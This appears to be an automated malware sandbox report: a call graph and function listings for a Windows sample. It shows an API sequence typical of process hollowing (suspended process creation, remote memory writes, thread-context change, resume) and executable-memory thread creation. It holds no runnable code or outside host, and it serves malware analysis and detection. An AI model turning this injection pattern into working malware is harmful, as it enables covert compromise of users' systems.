14365 389c89 __fread_nolock 41 API calls 14364->14365 14366 39485f 14365->14366 14367 3947f4 14366->14367 14368 38ee48 ___free_lconv_mon 14 API calls 14366->14368 14369 394812 14367->14369 14368->14367 14386 38a76a LeaveCriticalSection 14369->14386 14371 394800 14371->13880 14373 389c9a 14372->14373 14381 389c96 ctype 14372->14381 14374 389ca1 14373->14374 14377 389cb4 __fread_nolock 14373->14377 
14375 38b188 __dosmaperr 14 API calls 14374->14375 14376 389ca6 14375->14376 14378 389007 __strnicoll 41 API calls 14376->14378 14379 389ceb 14377->14379 14380 389ce2 14377->14380 14377->14381 14378->14381 14379->14381 14384 38b188 __dosmaperr 14 API calls 14379->14384 14382 38b188 __dosmaperr 14 API calls 14380->14382 14381->14364 14383 389ce7 14382->14383 14385 389007 __strnicoll 41 API calls 14383->14385 14384->14383 14385->14381 14386->14371 14388 38e074 14387->14388 14389 38e082 14387->14389 14388->14389 14394 38e09a 14388->14394 14390 38b188 __dosmaperr 14 API calls 14389->14390 14391 38e08a 14390->14391 14392 389007 __strnicoll 41 API calls 14391->14392 14393 38e094 14392->14393 14393->13822 14394->14393 14395 38b188 __dosmaperr 14 API calls 14394->14395 14395->14391 14400 38bde7 14396->14400 14401 38bdb8 14396->14401 14397 38bdfe 14399 38ee48 ___free_lconv_mon 14 API calls 14397->14399 14398 38ee48 ___free_lconv_mon 14 API calls 14398->14400 14399->14401 14400->14397 14400->14398 14401->13823 14403 389040 14402->14403 14404 388e0b __CreateFrameInfo 8 API calls 14403->14404 14405 389055 GetCurrentProcess TerminateProcess 14404->14405 14405->13829 14408 381737 __EH_prolog3_catch _strlen 14406->14408 14440 381aff 14408->14440 14410 3818d8 14453 381ae4 14410->14453 14412 3818e0 std::ios_base::_Init 14412->13632 14413 38179c 14444 3814f1 14413->14444 14415 3815d4 _strlen 14414->14415 14590 3818ee 14415->14590 14417 3815e1 14417->13634 14419 3816aa 14418->14419 14421 381680 std::ios_base::_Init 14418->14421 14597 3819c7 14419->14597 14421->13636 14423 39c01c 14422->14423 14424 39c089 14423->14424 14617 381e21 14423->14617 14425 39c09c 14424->14425 14427 381a7b _Deallocate 41 API calls 14424->14427 14425->13641 14427->14425 14429 38479f std::_Facet_Register 43 API calls 14428->14429 14431 39c0c4 14429->14431 14432 381a7b _Deallocate 41 API calls 14431->14432 14433 39c1f5 14431->14433 14639 381cbf 14431->14639 14432->14431 14434 384791 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14433->14434 14435 39c210 CreateThread WaitForSingleObjectEx 14434->14435 14436 381644 14435->14436 14437 381658 14436->14437 14438 38164f 14436->14438 14437->13646 14439 381a7b _Deallocate 41 API calls 14438->14439 14439->14437 14442 381b1d 14440->14442 14441 381b40 14441->14413 14442->14441 14457 381ba4 14442->14457 14445 38154c 14444->14445 14447 381508 std::ios_base::_Init 14444->14447 14445->14410 14452 381541 14447->14452 14465 3814c8 14447->14465 14448 38155a 14471 38144e 14448->14471 14468 385ad1 14452->14468 14454 381aec 14453->14454 14455 381af7 14454->14455 14586 381c62 14454->14586 14455->14412 14458 381bb0 __EH_prolog3_catch 14457->14458 14459 381c55 std::ios_base::_Init 14458->14459 14460 381aff 43 API calls 14458->14460 14459->14441 14462 381bcf 14460->14462 14461 381c4d 14463 381ae4 43 API calls 14461->14463 14462->14461 14464 3814f1 std::ios_base::_Init 43 API calls 14462->14464 14463->14459 14464->14461 14474 3813dd 14465->14474 14469 385b18 RaiseException 14468->14469 14470 385aeb 14468->14470 14469->14448 14470->14469 14583 381105 14471->14583 14475 3815b7 std::ios_base::_Init 43 API calls 14474->14475 14476 381401 14475->14476 14483 38134d 14476->14483 14479 381644 std::ios_base::_Init 41 API calls 14480 38141c 14479->14480 14481 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14480->14481 14482 381430 14481->14482 14482->14452 14494 381610 14483->14494 14490 381644 std::ios_base::_Init 41 API calls 14491 381390 14490->14491 14492 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14491->14492 14493 3813af 14492->14493 14493->14479 14495 381630 14494->14495 14514 38195f 14495->14514 14497 38136e 14498 3812cb 14497->14498 14499 3812fc 14498->14499 14500 3812e6 _strlen 14498->14500 14502 38166a std::ios_base::_Init 43 API calls 14499->14502 14501 38166a std::ios_base::_Init 43 API calls 14500->14501 14501->14499 14503 381322 
14502->14503 14504 381644 std::ios_base::_Init 41 API calls 14503->14504 14505 38132a std::ios_base::_Init 14504->14505 14506 381644 std::ios_base::_Init 41 API calls 14505->14506 14507 38133d 14506->14507 14508 384791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14507->14508 14509 38134b 14508->14509 14510 381209 14509->14510 14511 381216 14510->14511 14565 3810d0 14511->14565 14515 3819c1 14514->14515 14518 381970 std::ios_base::_Init 14514->14518 14529 3811fe 14515->14529 14520 381977 std::ios_base::_Init ctype 14518->14520 14521 381f40 14518->14521 14520->14497 14522 381f4b 14521->14522 14525 381f53 14521->14525 14532 381f6d 14522->14532 14524 381f5f 14524->14520 14525->14524 14546 38479f 14525->14546 14526 381f51 14526->14520 14528 381f5d 14528->14520 14560 383a16 14529->14560 14533 381f7c 14532->14533 14534 38118f Concurrency::cancel_current_task 14532->14534 14535 38479f std::_Facet_Register 43 API calls 14533->14535 14537 385ad1 CallUnexpected RaiseException 14534->14537 14538 381f82 14535->14538 14536 381f89 14536->14526 14539 3811ab 14537->14539 14538->14536 14540 388f53 _Deallocate 41 API calls 14538->14540 14541 381105 std::bad_exception::bad_exception 42 API calls 14539->14541 14542 389026 14540->14542 14543 3811b8 14541->14543 14544 389034 _Deallocate 11 API calls 14542->14544 14543->14526 14545 389033 14544->14545 14549 3847a4 14546->14549 14547 38a798 _Yarn 15 API calls 14547->14549 14548 3847be 14548->14528 14549->14547 14549->14548 14550 38dac3 std::_Facet_Register EnterCriticalSection LeaveCriticalSection 14549->14550 14551 3847c0 14549->14551 14550->14549 14552 38118f Concurrency::cancel_current_task 14551->14552 14553 3847ca std::_Facet_Register 14551->14553 14554 385ad1 CallUnexpected RaiseException 14552->14554 14555 385ad1 CallUnexpected RaiseException 14553->14555 14556 3811ab 14554->14556 14557 3852ae 14555->14557 14558 381105 std::bad_exception::bad_exception 42 API calls 14556->14558 14559 3811b8 14558->14559 
14559->14528 14561 3839bd std::invalid_argument::invalid_argument 42 API calls 14560->14561 14562 383a27 14561->14562 14563 385ad1 CallUnexpected RaiseException 14562->14563 14564 383a35 14563->14564 14568 3852eb 14565->14568 14569 3852f8 14568->14569 14575 3810fc 14568->14575 14569->14575 14576 38a798 14569->14576 14572 385325 14573 38a6c6 _Yarn 14 API calls 14572->14573 14573->14575 14574 38e066 ___std_exception_copy 41 API calls 14574->14572 14575->14490 14581 391e71 __dosmaperr 14576->14581 14577 391eaf 14578 38b188 __dosmaperr 14 API calls 14577->14578 14580 385315 14578->14580 14579 391e9a HeapAlloc 14579->14580 14579->14581 14580->14572 14580->14574 14581->14577 14581->14579 14582 38dac3 std::_Facet_Register EnterCriticalSection LeaveCriticalSection 14581->14582 14582->14581 14584 3852eb ___std_exception_copy 42 API calls 14583->14584 14585 381126 14584->14585 14585->14410 14588 381c6e __EH_prolog3_catch 14586->14588 14587 381caa std::ios_base::_Init 14587->14455 14588->14587 14589 3814f1 std::ios_base::_Init 43 API calls 14588->14589 14589->14587 14591 381959 14590->14591 14594 3818ff std::ios_base::_Init 14590->14594 14592 3811fe std::ios_base::_Init 43 API calls 14591->14592 14593 38195e 14592->14593 14595 381f40 std::ios_base::_Init 43 API calls 14594->14595 14596 381906 std::ios_base::_Init 14594->14596 14595->14596 14596->14417 14598 381a75 14597->14598 14600 3819e4 std::ios_base::_Init 14597->14600 14599 3811fe std::ios_base::_Init 43 API calls 14598->14599 14601 381a7a 14599->14601 14602 381f40 std::ios_base::_Init 43 API calls 14600->14602 14603 381a03 std::ios_base::_Init 14602->14603 14605 381a43 std::ios_base::_Init 14603->14605 14606 381a7b 14603->14606 14605->14421 14607 381a88 14606->14607 14608 381a95 error_info_injector 14606->14608 14610 3811dc 14607->14610 14608->14605 14611 3811f9 14610->14611 14612 3811f6 14610->14612 14613 388f53 _Deallocate 41 API calls 14611->14613 14612->14608 14614 389026 14613->14614 14615 389034 _Deallocate 11 API 
calls 14614->14615 14616 389033 14615->14616 14618 381e2d __EH_prolog3_catch 14617->14618 14619 381e4a 14618->14619 14620 381f30 14618->14620 14622 381e67 14619->14622 14623 381f35 14619->14623 14630 381f62 14620->14630 14625 381f40 std::ios_base::_Init 43 API calls 14622->14625 14633 38118f 14623->14633 14627 381e7d ctype 14625->14627 14628 381efc std::ios_base::_Init 14627->14628 14629 381a7b _Deallocate 41 API calls 14627->14629 14628->14423 14629->14628 14631 383a16 std::_Xinvalid_argument 43 API calls 14630->14631 14632 381f6c 14631->14632 14634 38119d Concurrency::cancel_current_task 14633->14634 14635 385ad1 CallUnexpected RaiseException 14634->14635 14636 3811ab 14635->14636 14637 381105 std::bad_exception::bad_exception 42 API calls 14636->14637 14638 3811b8 14637->14638 14640 381ccb __EH_prolog3_catch 14639->14640 14641 381ce8 14640->14641 14642 381dd2 14640->14642 14643 381d05 14641->14643 14645 381dd7 14641->14645 14644 381f62 43 API calls 14642->14644 14646 381f40 std::ios_base::_Init 43 API calls 14643->14646 14644->14645 14647 38118f Concurrency::cancel_current_task 43 API calls 14645->14647 14649 381d1b ctype 14646->14649 14648 381ddc 14647->14648 14650 381d9e std::ios_base::_Init 14649->14650 14651 381a7b _Deallocate 41 API calls 14649->14651 14650->14431 14651->14650 14653 38c0ef 14652->14653 14654 38c101 14652->14654 14679 38c18a GetModuleHandleW 14653->14679 14664 38bf8a 14654->14664 14659 38477e 14659->13672 14663 38c153 14665 38bf96 ___scrt_is_nonwritable_in_current_image 14664->14665 14687 38a722 EnterCriticalSection 14665->14687 14667 38bfa0 14688 38bfd7 14667->14688 14669 38bfad 14692 38bfcb 14669->14692 14672 38c159 14717 38c1cd 14672->14717 14675 38c177 14677 38c1ef __CreateFrameInfo 3 API calls 14675->14677 14676 38c167 GetCurrentProcess TerminateProcess 14676->14675 14678 38c17f ExitProcess 14677->14678 14680 38c0f4 14679->14680 14680->14654 14681 38c1ef GetModuleHandleExW 14680->14681 14682 38c22e GetProcAddress 14681->14682 14683 
38c24f 14681->14683 14682->14683 14686 38c242 14682->14686 14684 38c100 14683->14684 14685 38c255 FreeLibrary 14683->14685 14684->14654 14685->14684 14686->14683 14687->14667 14690 38bfe3 ___scrt_is_nonwritable_in_current_image 14688->14690 14689 38c04a __CreateFrameInfo 14689->14669 14690->14689 14695 38ddf4 14690->14695 14716 38a76a LeaveCriticalSection 14692->14716 14694 38bfb9 14694->14659 14694->14672 14696 38de00 __EH_prolog3 14695->14696 14699 38db4c 14696->14699 14698 38de27 std::ios_base::_Init 14698->14689 14700 38db58 ___scrt_is_nonwritable_in_current_image 14699->14700 14707 38a722 EnterCriticalSection 14700->14707 14702 38db66 14708 38dd04 14702->14708 14707->14702 14709 38db73 14708->14709 14710 38dd23 14708->14710 14712 38db9b 14709->14712 14710->14709 14711 38ee48 ___free_lconv_mon 14 API calls 14710->14711 14711->14709 14715 38a76a LeaveCriticalSection 14712->14715 14714 38db84 14714->14698 14715->14714 14716->14694 14722 39547e GetPEB 14717->14722 14720 38c163 14720->14675 14720->14676 14721 38c1d7 GetPEB 14721->14720 14723 395498 14722->14723 14724 38c1d2 14722->14724 14726 38f1a6 14723->14726 14724->14720 14724->14721 14727 38f123 std::_Lockit::_Lockit 5 API calls 14726->14727 14728 38f1c2 14727->14728 14728->14724 14730 38dfb8 ___scrt_uninitialize_crt 14729->14730 14731 38dfa6 14729->14731 14730->13666 14732 38dfb4 14731->14732 14734 38965a 14731->14734 14732->13666 14737 3894e7 14734->14737 14740 3893db 14737->14740 14741 3893e7 ___scrt_is_nonwritable_in_current_image 14740->14741 14748 38a722 EnterCriticalSection 14741->14748 14743 38945d 14757 38947b 14743->14757 14746 3893f1 ___scrt_uninitialize_crt 14746->14743 14749 38934f 14746->14749 14748->14746 14750 38935b ___scrt_is_nonwritable_in_current_image 14749->14750 14760 3891d2 EnterCriticalSection 14750->14760 14752 389365 ___scrt_uninitialize_crt 14753 38939e 14752->14753 14761 3895f5 14752->14761 14774 3893cf 14753->14774 14876 38a76a LeaveCriticalSection 14757->14876 14759 389469 
14759->14732 14760->14752 14762 38960a _Fputc 14761->14762 14763 38961c 14762->14763 14764 389611 14762->14764 14777 38958c 14763->14777 14765 3894e7 ___scrt_uninitialize_crt 70 API calls 14764->14765 14767 389617 14765->14767 14769 388d43 _Fputc 41 API calls 14767->14769 14770 389654 14769->14770 14770->14753 14772 38963d 14790 38fbc1 14772->14790 14875 3891e6 LeaveCriticalSection 14774->14875 14776 3893bd 14776->14746 14778 3895a5 14777->14778 14779 3895cc 14777->14779 14778->14779 14780 38f8e9 __fread_nolock 41 API calls 14778->14780 14779->14767 14783 38f8e9 14779->14783 14781 3895c1 14780->14781 14801 3903ec 14781->14801 14784 38f90a 14783->14784 14785 38f8f5 14783->14785 14784->14772 14786 38b188 __dosmaperr 14 API calls 14785->14786 14787 38f8fa 14786->14787 14788 389007 __strnicoll 41 API calls 14787->14788 14789 38f905 14788->14789 14789->14772 14791 38fbdf 14790->14791 14792 38fbd2 14790->14792 14793 38fc28 14791->14793 14796 38fc06 14791->14796 14794 38b188 __dosmaperr 14 API calls 14792->14794 14795 38b188 __dosmaperr 14 API calls 14793->14795 14800 38fbd7 14794->14800 14797 38fc2d 14795->14797 14842 38fb1f 14796->14842 14799 389007 __strnicoll 41 API calls 14797->14799 14799->14800 14800->14767 14804 3903f8 ___scrt_is_nonwritable_in_current_image 14801->14804 14802 390400 14802->14779 14803 3904bc 14805 388f8a _Deallocate 41 API calls 14803->14805 14804->14802 14804->14803 14806 39044d 14804->14806 14805->14802 14812 3955fd EnterCriticalSection 14806->14812 14808 390453 14810 390470 14808->14810 14813 3904f4 14808->14813 14839 3904b4 14810->14839 14812->14808 14814 390519 14813->14814 14838 39053c __fread_nolock 14813->14838 14815 39051d 14814->14815 14817 39057b 14814->14817 14816 388f8a _Deallocate 41 API calls 14815->14816 14816->14838 14818 390592 14817->14818 14819 391cd2 ___scrt_uninitialize_crt 43 API calls 14817->14819 14820 390078 ___scrt_uninitialize_crt 42 API calls 14818->14820 14819->14818 14821 39059c 14820->14821 14822 3905e2 
14821->14822 14823 3905a2 14821->14823 14824 390645 WriteFile 14822->14824 14825 3905f6 14822->14825 14826 3905a9 14823->14826 14827 3905cc 14823->14827 14830 390667 GetLastError 14824->14830 14824->14838 14828 3905fe 14825->14828 14829 390633 14825->14829 14834 390010 ___scrt_uninitialize_crt 6 API calls 14826->14834 14826->14838 14831 38fc3e ___scrt_uninitialize_crt 47 API calls 14827->14831 14832 390621 14828->14832 14833 390603 14828->14833 14835 3900f6 ___scrt_uninitialize_crt 7 API calls 14829->14835 14830->14838 14831->14838 14836 3902ba ___scrt_uninitialize_crt 8 API calls 14832->14836 14837 3901d1 ___scrt_uninitialize_crt 7 API calls 14833->14837 14833->14838 14834->14838 14835->14838 14836->14838 14837->14838 14838->14810 14840 395620 ___scrt_uninitialize_crt LeaveCriticalSection 14839->14840 14841 3904ba 14840->14841 14841->14802 14843 38fb2b ___scrt_is_nonwritable_in_current_image 14842->14843 14855 3955fd EnterCriticalSection 14843->14855 14845 38fb3a 14846 38fb7f 14845->14846 14856 3956d4 14845->14856 14847 38b188 __dosmaperr 14 API calls 14846->14847 14849 38fb86 14847->14849 14872 38fbb5 14849->14872 14850 38fb66 FlushFileBuffers 14850->14849 14851 38fb72 GetLastError 14850->14851 14869 38b175 14851->14869 14855->14845 14857 3956e1 14856->14857 14858 3956f6 14856->14858 14859 38b175 __dosmaperr 14 API calls 14857->14859 14861 38b175 __dosmaperr 14 API calls 14858->14861 14863 39571b 14858->14863 14860 3956e6 14859->14860 14862 38b188 __dosmaperr 14 API calls 14860->14862 14864 395726 14861->14864 14866 3956ee 14862->14866 14863->14850 14865 38b188 __dosmaperr 14 API calls 14864->14865 14867 39572e 14865->14867 14866->14850 14868 389007 __strnicoll 41 API calls 14867->14868 14868->14866 14870 38ec51 __dosmaperr 14 API calls 14869->14870 14871 38b17a 14870->14871 14871->14846 14873 395620 ___scrt_uninitialize_crt LeaveCriticalSection 14872->14873 14874 38fb9e 14873->14874 14874->14800 14875->14776 14876->14759 13585 ee018d 13586 ee01c5 13585->13586 
13586->13586 13587 ee02d3 CreateProcessA VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 13586->13587 13587->13586 13588 ee03a2 WriteProcessMemory 13587->13588 13589 ee03e7 13588->13589 13590 ee03ec WriteProcessMemory 13589->13590 13591 ee0429 WriteProcessMemory Wow64SetThreadContext ResumeThread 13589->13591 13590->13589 15888 38f85d 15889 38f869 ___scrt_is_nonwritable_in_current_image 15888->15889 15900 38a722 EnterCriticalSection 15889->15900 15891 38f870 15901 39555f 15891->15901 15893 38f88e 15925 38f8b4 15893->15925 15900->15891 15902 39556b ___scrt_is_nonwritable_in_current_image 15901->15902 15903 395595 15902->15903 15904 395574 15902->15904 15928 38a722 EnterCriticalSection 15903->15928 15906 38b188 __dosmaperr 14 API calls 15904->15906 15907 395579 15906->15907 15908 389007 __strnicoll 41 API calls 15907->15908 15911 38f87f 15908->15911 15911->15893 15914 38f6f7 GetStartupInfoW 15911->15914 15912 3955cd 15936 3955f4 15912->15936 15913 3955a1 15913->15912 15929 3954af 15913->15929 15915 38f714 15914->15915 15917 38f7a8 15914->15917 15916 39555f 42 API calls 15915->15916 15915->15917 15918 38f73c 15916->15918 15920 38f7ad 15917->15920 15918->15917 15919 38f76c GetFileType 15918->15919 15919->15918 15922 38f7b4 15920->15922 15921 38f7f7 GetStdHandle 15921->15922 15922->15921 15923 38f859 15922->15923 15924 38f80a GetFileType 15922->15924 15923->15893 15924->15922 15940 38a76a LeaveCriticalSection 15925->15940 15927 38f89f 15928->15913 15930 38edeb __dosmaperr 14 API calls 15929->15930 15932 3954c1 15930->15932 15931 3954ce 15933 38ee48 ___free_lconv_mon 14 API calls 15931->15933 15932->15931 15935 38f430 6 API calls 15932->15935 15934 395523 15933->15934 15934->15913 15935->15932 15939 38a76a LeaveCriticalSection 15936->15939 15938 3955fb 15938->15911 15939->15938 15940->15927 14877 394d54 14878 394d8f 14877->14878 14879 394d5d 14877->14879 14880 38ebbb 41 API calls 14879->14880 14881 394d80 14880->14881 14882 394b5f 52 API calls 
14881->14882 14882->14878 17507 389140 17508 38965a ___scrt_uninitialize_crt 70 API calls 17507->17508 17509 389148 17508->17509 17517 38f60c 17509->17517 17511 38914d 17512 38f6b7 14 API calls 17511->17512 17513 38915c DeleteCriticalSection 17512->17513 17513->17511 17514 389177 17513->17514 17515 38ee48 ___free_lconv_mon 14 API calls 17514->17515 17516 389182 17515->17516 17518 38f618 ___scrt_is_nonwritable_in_current_image 17517->17518 17527 38a722 EnterCriticalSection 17518->17527 17520 38f68f 17528 38f6ae 17520->17528 17523 38f663 DeleteCriticalSection 17525 38ee48 ___free_lconv_mon 14 API calls 17523->17525 17524 38931f 71 API calls 17526 38f623 17524->17526 17525->17526 17526->17520 17526->17523 17526->17524 17527->17526 17531 38a76a LeaveCriticalSection 17528->17531 17530 38f69b 17530->17511 17531->17530 18148 38e9c7 18149 38e9d2 18148->18149 18150 38e9e2 18148->18150 18154 38e9e8 18149->18154 18153 38ee48 ___free_lconv_mon 14 API calls 18153->18150 18155 38e9fd 18154->18155 18156 38ea03 18154->18156 18158 38ee48 ___free_lconv_mon 14 API calls 18155->18158 18157 38ee48 ___free_lconv_mon 14 API calls 18156->18157 18159 38ea0f 18157->18159 18158->18156 18160 38ee48 ___free_lconv_mon 14 API calls 18159->18160 18161 38ea1a 18160->18161 18162 38ee48 ___free_lconv_mon 14 API calls 18161->18162 18163 38ea25 18162->18163 18164 38ee48 ___free_lconv_mon 14 API calls 18163->18164 18165 38ea30 18164->18165 18166 38ee48 ___free_lconv_mon 14 API calls 18165->18166 18167 38ea3b 18166->18167 18168 38ee48 ___free_lconv_mon 14 API calls 18167->18168 18169 38ea46 18168->18169 18170 38ee48 ___free_lconv_mon 14 API calls 18169->18170 18171 38ea51 18170->18171 18172 38ee48 ___free_lconv_mon 14 API calls 18171->18172 18173 38ea5c 18172->18173 18174 38ee48 ___free_lconv_mon 14 API calls 18173->18174 18175 38ea6a 18174->18175 18180 38e814 18175->18180 18181 38e820 ___scrt_is_nonwritable_in_current_image 18180->18181 18196 38a722 EnterCriticalSection 18181->18196 18183 38e854 18197 
38e873 18183->18197 18186 38e82a 18186->18183 18187 38ee48 ___free_lconv_mon 14 API calls 18186->18187 18187->18183 18188 38e87f 18189 38e88b ___scrt_is_nonwritable_in_current_image 18188->18189 18201 38a722 EnterCriticalSection 18189->18201 18191 38e895 18192 38eab5 __dosmaperr 14 API calls 18191->18192 18193 38e8a8 18192->18193 18202 38e8c8 18193->18202 18196->18186 18200 38a76a LeaveCriticalSection 18197->18200 18199 38e861 18199->18188 18200->18199 18201->18191 18205 38a76a LeaveCriticalSection 18202->18205 18204 38e8b6 18204->18153 18205->18204

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00EE02FC
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00EE030F
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00EE032D
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EE0351
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00EE037C
                                                                                    • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00EE03D4
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00EE041F
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EE045D
                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00EE0499
                                                                                    • ResumeThread.KERNELBASE(?), ref: 00EE04A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105430536.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                    • String ID: GetP$Load$aryA$ress
                                                                                    • API String ID: 2687962208-977067982
                                                                                    • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                    • Instruction ID: ecc3f3ca77bdda4e38d6ce1559ea7f5cfb11a79a23ad80c1bc9df08696ce3a8f
                                                                                    • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                    • Instruction Fuzzy Hash: F3B1F67260028AAFDB60CF69CC80BDA77A5FF88714F158524EA0CEB341D774FA418B94

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 387 39547e-395496 GetPEB 388 395498-39549c call 38f1a6 387->388 389 3954a7-3954a9 387->389 392 3954a1-3954a5 388->392 391 3954aa-3954ae 389->391 392->389 392->391
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6d3a586ec2da16d7fd3ee7ee03ae3402aab8ac5a3c6cbba84838bbe677f8115f
                                                                                    • Instruction ID: e638ab17764ce1768e1ad668670cc96f2cc7bede7a238c443a55bd16d4a43c43
                                                                                    • Opcode Fuzzy Hash: 6d3a586ec2da16d7fd3ee7ee03ae3402aab8ac5a3c6cbba84838bbe677f8115f
                                                                                    • Instruction Fuzzy Hash: 9AE08C32A11228EBCB66DBCAC909D8AF3FCEB44B11B1100AAF501D3100C270DE80CBD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4c992419eee8842309e7582ba631cfc6caef1f6ffe052a819ae54955aa5ef9da
                                                                                    • Instruction ID: 6358bb1a96622d0629f0182b5ce72377694c2bbcf7b85a1898320f4e97c475d8
                                                                                    • Opcode Fuzzy Hash: 4c992419eee8842309e7582ba631cfc6caef1f6ffe052a819ae54955aa5ef9da
                                                                                    • Instruction Fuzzy Hash: A8C08C34010A0047CE2BA9248AB53A43358A392782F8025CCC402CBA43C52E9DC2D720

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0038172B: __EH_prolog3_catch.LIBCMT ref: 00381732
                                                                                      • Part of subcall function 0038172B: _strlen.LIBCMT ref: 0038174A
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0039C234
                                                                                      • Part of subcall function 003815B7: _strlen.LIBCMT ref: 003815CF
                                                                                    • _strlen.LIBCMT ref: 0039C24F
                                                                                    • _strlen.LIBCMT ref: 0039C265
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0039C282
                                                                                    • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 0039C2A0
                                                                                      • Part of subcall function 0039C000: _Deallocate.LIBCONCRT ref: 0039C097
                                                                                      • Part of subcall function 0039C0A0: _Deallocate.LIBCONCRT ref: 0039C1CB
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,00000188,003A7AC0,00000000,00000000), ref: 0039C2D1
                                                                                    • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 0039C2DB
                                                                                      • Part of subcall function 00381644: _Deallocate.LIBCONCRT ref: 00381653
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _strlen$Deallocate$AddressAllocCreateH_prolog3_catchHandleModuleObjectProcSingleThreadVirtualWait
                                                                                    • String ID: Cons$Free$kernel32.dll$ole
                                                                                    • API String ID: 2500176202-3464035140
                                                                                    • Opcode ID: 78230aa668c0b4acbe7a1df60faf1ba55649a7e6bc4587f4f2100aef34eca918
                                                                                    • Instruction ID: 54abdfd708ad86a2e12025a5ab07b72e00f90da95a2de125834a09c77fc72c76
                                                                                    • Opcode Fuzzy Hash: 78230aa668c0b4acbe7a1df60faf1ba55649a7e6bc4587f4f2100aef34eca918
                                                                                    • Instruction Fuzzy Hash: 5D216272900308BEDB12B7B4EC8ADBF777CEF45754F500459F411AA291DA749D06C724

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
